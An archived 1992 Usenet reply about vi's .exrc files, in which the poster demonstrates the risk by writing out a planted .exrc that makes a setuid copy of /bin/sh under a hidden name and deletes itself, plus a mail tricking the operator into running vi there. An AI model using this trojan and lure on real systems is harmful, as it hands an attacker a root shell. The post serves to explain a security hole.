home *** CD-ROM | disk | FTP | other *** search
/ NetNews Usenet Archive 1992 #30 / NN_1992_30.iso / spool / comp / unix / question / 14687 < prev    next >
Encoding:
Internet Message Format  |  1992-12-14  |  1.1 KB

  1. Path: sparky!uunet!usc!cs.utexas.edu!asuvax!chnews!sedona!bhoughto
  2. From: bhoughto@sedona.intel.com (Blair P. Houghton)
  3. Newsgroups: comp.unix.questions
  4. Subject: Re: .exrc file for vi customization
  5. Date: 14 Dec 1992 20:35:06 GMT
  6. Organization: Intel Corp., Chandler, Arizona
  7. Lines: 24
  8. Message-ID: <1gir5qINNo3b@chnews.intel.com>
  9. References: <1992Dec09.171536.9561@ssc.com> <MERLYN.92Dec10235241@romulus.reed.edu> <1992Dec13.071241.14691@jpradley.jpr.com>
  10. NNTP-Posting-Host: alfalfa.intel.com
  11.  
  12. In article <1992Dec13.071241.14691@jpradley.jpr.com> jpr@jpradley.jpr.com (Jean-Pierre Radley) writes:
  13. >I'm thinking about it. If I do that as 'root' on my system, what difference
  14. >does it make to what you, as 'merlyn' on my system, would be able to do?
  15.  
  16. % cd ~/News
  17. % cat > .exrc
  18. !cp /bin/sh ./.Alt.Binaries.Pictures.Erotica.KILL
  19. !chmod +s ./.Alt.Binaries.Pictures.Erotica.KILL
  20. !rm ./.exrc
  21. ^D
  22. % echo bar > foo
  23. % mail operator
  24. Hi,
  25.  
  26. I'm having a problem with vi(1).  Could you go into
  27. directory ~bhoughto/News and try it out on file "foo"
  28. to see if it runs for you?
  29.  
  30. Thanks,
  31.  
  32.                 --Blair
  33.                   "We're in the mon-ney;
  34.                    We're in the mon-ney..."
  35. ^D
  36.